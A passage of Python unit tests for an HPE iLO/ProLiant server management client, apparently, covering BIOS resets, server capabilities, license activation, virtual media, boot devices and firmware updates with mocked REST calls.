def test_reset_ilo_credential_no_account(self, collection_mock):
uri = '/rest/v1/AccountService/Accounts/1'
self.client = ris.RISOperations("1.2.3.4", "Admin", "Admin")
collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
item = collection_output['Items'][0]
collection_mock.return_value = [(200, None, item, uri)]
self.assertRaises(exception.IloError,
self.client.reset_ilo_credential,
'<PASSWORD>-password')
@mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_bios_hash_password')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_operation_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_reset_bios_to_default(self, check_mock, bios_mock, op_mock,
get_mock, passwd_mock, patch_mock,
validate_mock):
settings_uri = '/rest/v1/systems/1/bios/Settings'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
default_config = base_config['BaseConfigs'][0]['default']
check_mock.return_value = (ris_outputs.GET_HEADERS, 'fake',
json.loads(ris_outputs.GET_BIOS_SETTINGS))
op_mock.return_value = False
passwd_mock.return_value = {}
get_mock.return_value = (200, 'fake', base_config)
bios_mock.return_value = (ris_outputs.GET_HEADERS,
settings_uri, {})
patch_mock.return_value = (200, 'fake', 'fake')
self.client.reset_bios_to_default()
check_mock.assert_called_once_with()
bios_mock.assert_called_once_with(settings)
op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/BaseConfigs')
passwd_mock.assert_called_once_with(None)
patch_mock.assert_called_once_with(settings_uri, {}, default_config)
validate_mock.assert_called_once_with(ris_outputs.GET_HEADERS,
settings_uri)
@mock.patch.object(ris.RISOperations, '_is_raid_supported')
@mock.patch.object(ris.RISOperations, '_get_logical_raid_levels')
@mock.patch.object(ris.RISOperations, '_get_drive_type_and_speed')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_get_nvdimm_n_status')
@mock.patch.object(ris.RISOperations,
'_get_cpu_virtualization')
@mock.patch.object(ris.RISOperations, '_get_tpm_capability')
@mock.patch.object(ris.RISOperations,
'_get_number_of_gpu_devices_connected')
@mock.patch.object(ris.RISOperations, 'get_supported_boot_mode')
@mock.patch.object(ris.RISOperations, 'get_secure_boot_mode')
@mock.patch.object(ris.RISOperations, '_get_ilo_firmware_version')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_server_capabilities(self, get_details_mock, ilo_firm_mock,
secure_mock, boot_mode_mock, gpu_mock,
tpm_mock, cpu_vt_mock, nvdimm_n_mock,
bios_sriov_mock, iscsi_boot_mock,
drive_mock, raid_mock, raid_support_mock):
host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_details
ilo_firm_mock.return_value = {'ilo_firmware_version': 'iLO 4 v2.20'}
gpu_mock.return_value = {'pci_gpu_devices': 2}
boot_mode_mock.return_value = (
constants.SUPPORTED_BOOT_MODE_UEFI_ONLY)
cpu_vt_mock.return_value = True
secure_mock.return_value = False
nvdimm_n_mock.return_value = True
tpm_mock.return_value = True
bios_sriov_mock.return_value = 'Disabled'
iscsi_boot_mock.return_value = '/rest/v1/systems/1/bios/iScsi'
drive_mock.return_value = {'has_rotational': True,
'rotational_drive_4800_rpm': True}
raid_mock.return_value = {'logical_raid_volume_0': 'true'}
raid_support_mock.return_value = True
expected_caps = {'secure_boot': 'true',
'ilo_firmware_version': 'iLO 4 v2.20',
'rom_firmware_version': u'I36 v1.40 (01/28/2015)',
'server_model': u'ProLiant BL460c Gen9',
'pci_gpu_devices': 2,
'trusted_boot': 'true',
'cpu_vt': 'true',
'nvdimm_n': 'true',
'boot_mode_bios': 'false',
'boot_mode_uefi': 'true',
'iscsi_boot': 'true',
'has_rotational': True,
'rotational_drive_4800_rpm': True,
'logical_raid_volume_0': 'true',
'hardware_supports_raid': 'true'}
capabilities = self.client.get_server_capabilities()
self.assertEqual(expected_caps, capabilities)
@mock.patch.object(ris.RISOperations, '_is_raid_supported')
@mock.patch.object(ris.RISOperations, '_get_logical_raid_levels')
@mock.patch.object(ris.RISOperations, '_get_drive_type_and_speed')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_get_nvdimm_n_status')
@mock.patch.object(ris.RISOperations,
'_get_cpu_virtualization')
@mock.patch.object(ris.RISOperations, '_get_tpm_capability')
@mock.patch.object(ris.RISOperations,
'_get_number_of_gpu_devices_connected')
@mock.patch.object(ris.RISOperations, 'get_supported_boot_mode')
@mock.patch.object(ris.RISOperations, 'get_secure_boot_mode')
@mock.patch.object(ris.RISOperations, '_get_ilo_firmware_version')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_server_capabilities_tp_absent(
self, get_details_mock, ilo_firm_mock, secure_mock, boot_mode_mock,
gpu_mock, tpm_mock, cpu_vt_mock, nvdimm_n_mock, bios_sriov_mock,
iscsi_mock, drive_mock, raid_mock, raid_support_mock):
host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_details
ilo_firm_mock.return_value = {'ilo_firmware_version': 'iLO 4 v2.20'}
gpu_mock.return_value = {'pci_gpu_devices': 2}
boot_mode_mock.return_value = (
constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_AND_UEFI)
secure_mock.return_value = False
nvdimm_n_mock.return_value = True
tpm_mock.return_value = False
cpu_vt_mock.return_value = True
bios_sriov_mock.return_value = 'Enabled'
iscsi_mock.side_effect = exception.IloCommandNotSupportedError('error')
drive_mock.return_value = {'has_rotational': True,
'rotational_drive_4800_rpm': True}
raid_mock.return_value = {'logical_raid_volume_0': 'true'}
raid_support_mock.return_value = False
expected_caps = {'secure_boot': 'true',
'ilo_firmware_version': 'iLO 4 v2.20',
'rom_firmware_version': u'I36 v1.40 (01/28/2015)',
'server_model': u'ProLiant BL460c Gen9',
'pci_gpu_devices': 2,
'cpu_vt': 'true',
'nvdimm_n': 'true',
'sriov_enabled': 'true',
'boot_mode_bios': 'true',
'boot_mode_uefi': 'true',
'has_rotational': True,
'rotational_drive_4800_rpm': True,
'logical_raid_volume_0': 'true'}
capabilities = self.client.get_server_capabilities()
self.assertEqual(expected_caps, capabilities)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor(
self, get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
ilo_firm = self.client.get_ilo_firmware_version_as_major_minor()
expected_ilo_firm = "2.04"
self.assertEqual(expected_ilo_firm, ilo_firm)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_suggested_min(
self, get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS_EQ_SUGGESTED)
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
ilo_firm = self.client.get_ilo_firmware_version_as_major_minor()
expected_ilo_firm = "2.30"
self.assertEqual(expected_ilo_firm, ilo_firm)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_gt_suggested_min(
self, get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS_GT_SUGGESTED)
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
ilo_firm = self.client.get_ilo_firmware_version_as_major_minor()
expected_ilo_firm = "2.54"
self.assertEqual(expected_ilo_firm, ilo_firm)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_no_firmware(
self, get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS_NO_FIRMWARE)
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
ilo_firm = self.client.get_ilo_firmware_version_as_major_minor()
expected_ilo_firm = None
self.assertEqual(expected_ilo_firm, ilo_firm)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test__get_ilo_firmware_version(self, get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
ilo_firm = self.client._get_ilo_firmware_version()
expected_ilo_firm = {'ilo_firmware_version': 'iLO 4 v2.20'}
self.assertIn('ilo_firmware_version', ilo_firm)
self.assertEqual(expected_ilo_firm, ilo_firm)
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license(self, get_ilo_details_mock, post_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
uri = '/rest/v1/Managers/1'
license_uri = "/rest/v1/Managers/1/LicenseService"
get_ilo_details_mock.return_value = (ilo_details, uri)
post_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.activate_license('testkey')
get_ilo_details_mock.assert_called_once_with()
post_mock.assert_called_once_with(license_uri, None,
{'LicenseKey': 'testkey'})
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license_IloError(self, get_ilo_details_mock, post_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
uri = '/rest/v1/Managers/1'
license_uri = "/rest/v1/Managers/1/LicenseService"
get_ilo_details_mock.return_value = (ilo_details, uri)
post_mock.return_value = (500, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError, self.client.activate_license,
'testkey')
get_ilo_details_mock.assert_called_once_with()
post_mock.assert_called_once_with(license_uri, None,
{'LicenseKey': 'testkey'})
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license_IloCommandNotSupported(self,
get_ilo_details_mock):
ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
del ilo_details['Oem']['Hp']['links']['LicenseService']
uri = '/rest/v1/Managers/1'
get_ilo_details_mock.return_value = (ilo_details, uri)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.activate_license, 'testkey')
get_ilo_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_floppy_empty(self, get_vm_device_status_mock):
floppy_resp = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
device_uri = floppy_resp["links"]["self"]["href"]
get_vm_device_status_mock.return_value = (floppy_resp, device_uri)
exp_result = json.loads(ris_outputs.GET_VM_STATUS_FLOPPY_EMPTY)
result = self.client.get_vm_status('FLOPPY')
self.assertEqual(result, exp_result)
get_vm_device_status_mock.assert_called_once_with('FLOPPY')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_floppy_inserted(self, get_vm_device_status_mock):
floppy_resp = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_INSERTED)
device_uri = floppy_resp["links"]["self"]["href"]
get_vm_device_status_mock.return_value = (floppy_resp, device_uri)
exp_result = json.loads(ris_outputs.GET_VM_STATUS_FLOPPY_INSERTED)
result = self.client.get_vm_status('FLOPPY')
self.assertEqual(result, exp_result)
get_vm_device_status_mock.assert_called_once_with('FLOPPY')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_cdrom_empty(self, get_vm_device_status_mock):
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_status_mock.return_value = (cdrom_resp, device_uri)
exp_result = json.loads(ris_outputs.GET_VM_STATUS_CDROM_EMPTY)
result = self.client.get_vm_status('CDROM')
self.assertEqual(result, exp_result)
get_vm_device_status_mock.assert_called_once_with('CDROM')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_cdrom_inserted(self, get_vm_device_status_mock):
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_status_mock.return_value = (cdrom_resp, device_uri)
exp_result = json.loads(ris_outputs.GET_VM_STATUS_CDROM_INSERTED)
result = self.client.get_vm_status('CDROM')
self.assertEqual(result, exp_result)
get_vm_device_status_mock.assert_called_once_with('CDROM')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test_set_vm_status_cdrom_connect(self, patch_mock):
self.client.set_vm_status('CDROM', boot_option='CONNECT')
self.assertFalse(patch_mock.called)
def test_set_vm_status_cdrom_invalid_arg(self):
self.assertRaises(exception.IloInvalidInputError,
self.client.set_vm_status,
device='CDROM',
boot_option='FOO')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_set_vm_status_cdrom(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = json.loads(ris_outputs.PATCH_VM_CDROM)
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.set_vm_status(device='CDROM', boot_option='BOOT_ONCE')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_set_vm_status_cdrom_fail(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = json.loads(ris_outputs.PATCH_VM_CDROM)
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client.set_vm_status,
device='CDROM', boot_option='BOOT_ONCE')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.insert_virtual_media('http://1.1.1.1/cdrom.iso',
device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, 'eject_virtual_media')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media_media_attached(self,
get_vm_device_mock,
eject_virtual_media_mock,
patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.insert_virtual_media('http://1.1.1.1/cdrom.iso',
device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
eject_virtual_media_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media_fail(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client.insert_virtual_media,
'http://1.1.1.1/cdrom.iso', device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = {'Image': None}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.eject_virtual_media(device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media_cdrom_empty(
self, get_vm_device_mock, patch_mock):
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
self.client.eject_virtual_media(device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
self.assertFalse(patch_mock.called)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media_fail(self, get_vm_device_mock, patch_mock):
vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
device_uri = cdrom_resp["links"]["self"]["href"]
get_vm_device_mock.return_value = (cdrom_resp, device_uri)
vm_patch = {'Image': None}
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client.eject_virtual_media, device='CDROM')
get_vm_device_mock.assert_called_once_with('CDROM')
patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_not_set(self, get_host_details_mock):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
ret = self.client.get_one_time_boot()
get_host_details_mock.assert_called_once_with()
self.assertEqual(ret, 'Normal')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_cdrom(self, get_host_details_mock):
system_data = json.loads(ris_outputs.RESP_BODY_FOR_SYSTEM_WITH_CDROM)
get_host_details_mock.return_value = system_data
ret = self.client.get_one_time_boot()
get_host_details_mock.assert_called_once_with()
self.assertEqual(ret, 'CDROM')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_UefiShell(self, get_host_details_mock):
system_data = json.loads(ris_outputs.RESP_BODY_WITH_UEFI_SHELL)
get_host_details_mock.return_value = system_data
ret = self.client.get_one_time_boot()
get_host_details_mock.assert_called_once_with()
self.assertEqual(ret, 'UefiShell')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_exc(self, get_host_details_mock):
system_data = json.loads(ris_outputs.RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT)
get_host_details_mock.return_value = system_data
self.assertRaises(exception.IloError,
self.client.get_one_time_boot)
get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_set_one_time_boot_cdrom(self, update_persistent_boot_mock):
self.client.set_one_time_boot('cdrom')
update_persistent_boot_mock.assert_called_once_with(
['cdrom'], persistent=False)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_set_one_time_boot_iscsi(self, update_persistent_boot_mock):
self.client.set_one_time_boot('ISCSI')
update_persistent_boot_mock.assert_called_once_with(
['ISCSI'], persistent=False)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_cdrom(self, get_host_details_mock):
system_data = json.loads(ris_outputs.SYSTEM_WITH_CDROM_CONT)
get_host_details_mock.return_value = system_data
ret = self.client.get_persistent_boot_device()
get_host_details_mock.assert_called_once_with()
self.assertEqual(ret, 'CDROM')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_UefiShell(self, get_host_details_mock):
system_data = json.loads(ris_outputs.SYSTEM_WITH_UEFISHELL_CONT)
get_host_details_mock.return_value = system_data
ret = self.client.get_persistent_boot_device()
get_host_details_mock.assert_called_once_with()
self.assertEqual(ret, 'UefiShell')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_exc(self, get_host_details_mock):
system_data = json.loads(ris_outputs.RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT)
get_host_details_mock.return_value = system_data
self.assertRaises(exception.IloError,
self.client.get_persistent_boot_device)
get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_bios(self, get_host_details_mock,
_uefi_boot_mode_mock):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
_uefi_boot_mode_mock.return_value = False
ret = self.client.get_persistent_boot_device()
get_host_details_mock.assert_called_once_with()
self.assertIsNone(ret)
@mock.patch.object(ris.RISOperations, '_get_persistent_boot_devices')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def _test_get_persistent_boot_device_uefi(self, get_host_details_mock,
_uefi_boot_mode_mock,
boot_devices_mock,
boot_devices,
boot_sources,
exp_ret_value=None):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
_uefi_boot_mode_mock.return_value = True
boot_devices_mock.return_value = boot_sources, boot_devices
ret = self.client.get_persistent_boot_device()
get_host_details_mock.assert_called_once_with()
_uefi_boot_mode_mock.assert_called_once_with()
boot_devices_mock.assert_called_once_with()
self.assertEqual(ret, exp_ret_value)
def test_get_persistent_boot_device_uefi_pxe(self):
boot_devs = ris_outputs.UEFI_BOOT_DEVICE_ORDER_PXE
boot_srcs = json.loads(ris_outputs.UEFI_BootSources)
self._test_get_persistent_boot_device_uefi(boot_devices=boot_devs,
boot_sources=boot_srcs,
exp_ret_value='NETWORK')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_uefi_cd(self, get_host_details_mock,
_uefi_boot_mode_mock):
boot_devs = ris_outputs.UEFI_BOOT_DEVICE_ORDER_CD
boot_srcs = json.loads(ris_outputs.UEFI_BootSources)
self._test_get_persistent_boot_device_uefi(boot_devices=boot_devs,
boot_sources=boot_srcs,
exp_ret_value='CDROM')
def test_get_persistent_boot_device_uefi_hdd(self):
boot_devs = ris_outputs.UEFI_BOOT_DEVICE_ORDER_HDD
boot_srcs = json.loads(ris_outputs.UEFI_BootSources)
self._test_get_persistent_boot_device_uefi(boot_devices=boot_devs,
boot_sources=boot_srcs,
exp_ret_value='HDD')
def test_get_persistent_boot_device_uefi_none(self):
boot_devs = ris_outputs.UEFI_BOOT_DEVICE_ORDER_ERR
boot_srcs = json.loads(ris_outputs.UEFI_BootSources)
self._test_get_persistent_boot_device_uefi(boot_devices=boot_devs,
boot_sources=boot_srcs,
exp_ret_value=None)
@mock.patch.object(ris.RISOperations, '_get_persistent_boot_devices')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_uefi_exp(self, get_host_details_mock,
_uefi_boot_mode_mock,
boot_devices_mock):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
_uefi_boot_mode_mock.return_value = True
devices = ris_outputs.UEFI_BOOT_DEVICE_ORDER_HDD
sources = json.loads(ris_outputs.UEFI_BOOT_SOURCES_ERR)
boot_devices_mock.return_value = sources, devices
self.assertRaises(exception.IloError,
self.client.get_persistent_boot_device)
get_host_details_mock.assert_called_once_with()
_uefi_boot_mode_mock.assert_called_once_with()
boot_devices_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_cdrom(self, update_persistent_boot_mock):
self.client.update_persistent_boot(['cdrom'])
update_persistent_boot_mock.assert_called_once_with(
['cdrom'], persistent=True)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_iscsi(self, update_persistent_boot_mock):
self.client.update_persistent_boot(['ISCSI'])
update_persistent_boot_mock.assert_called_once_with(
['ISCSI'], persistent=True)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_exc(self, update_persistent_boot_mock):
self.assertRaises(exception.IloError,
self.client.update_persistent_boot, ['fake'])
self.assertFalse(update_persistent_boot_mock.called)
def test_update_firmware_throws_error_for_invalid_component(self):
# | WHEN | & | THEN |
self.assertRaises(exception.InvalidInputError,
self.client.update_firmware,
'fw_file_url',
'invalid_component')
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
@mock.patch.object(ris.common, 'wait_for_ris_firmware_update_to_complete',
autospec=True)
@mock.patch.object(ris.RISOperations, 'get_firmware_update_progress',
autospec=True)
def test_update_firmware(
self, get_firmware_update_progress_mock,
wait_for_ris_firmware_update_to_complete_mock, _rest_post_mock,
_get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_post_mock.return_value = 200, 'some-headers', 'response'
get_firmware_update_progress_mock.return_value = 'COMPLETED', 100
# | WHEN |
self.client.update_firmware('fw_file_url', 'ilo')
# | THEN |
_get_firmware_update_service_resource_mock.assert_called_once_with(
self.client)
_rest_post_mock.assert_called_once_with(
self.client, mock.ANY, None, {'Action': 'InstallFromURI',
'FirmwareURI': 'fw_file_url',
})
wait_for_ris_firmware_update_to_complete_mock.assert_called_once_with(
self.client)
get_firmware_update_progress_mock.assert_called_once_with(
self.client)
@mock.patch.object(
ris.RISOperations, '_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
def test_update_firmware_throws_if_post_operation_fails(
self, _rest_post_mock, _get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_post_mock.return_value = 500, 'some-headers', 'response'
# | WHEN | & | THEN |
self.assertRaises(exception.IloError,
self.client.update_firmware,
'fw_file_url',
'cpld')
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
@mock.patch.object(ris.common, 'wait_for_ris_firmware_update_to_complete',
autospec=True)
@mock.patch.object(ris.RISOperations, 'get_firmware_update_progress',
autospec=True)
def test_update_firmware_throws_if_error_occurs_in_update(
self, get_firmware_update_progress_mock,
wait_for_ris_firmware_update_to_complete_mock, _rest_post_mock,
_get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_post_mock.return_value = 200, 'some-headers', 'response'
get_firmware_update_progress_mock.return_value = 'ERROR', 0
# | WHEN | & | THEN |
self.assertRaises(exception.IloError,
self.client.update_firmware,
'fw_file_url',
'ilo')
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_get', autospec=True)
def test_get_firmware_update_progress(
self, _rest_get_mock,
_get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_get_mock.return_value = (200, 'some-headers',
{'State': 'COMPLETED',
'ProgressPercent': 100})
# | WHEN |
state, percent = self.client.get_firmware_update_progress()
# | THEN |
_get_firmware_update_service_resource_mock.assert_called_once_with(
self.client)
_rest_get_mock.assert_called_once_with(self.client, mock.ANY)
self.assertTupleEqual((state, percent), ('COMPLETED', 100))
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_get', autospec=True)
def test_get_firmware_update_progress_throws_if_get_operation_fails(
self, _rest_get_mock, _get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_get_mock.return_value = 500, 'some-headers', 'response'
# | WHEN | & | THEN |
self.assertRaises(exception.IloError,
self.client.get_firmware_update_progress)
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_set_host_power_no_change(self, host_power_status_mock):
host_power_status_mock.return_value = 'ON'
self.client.set_host_power('on')
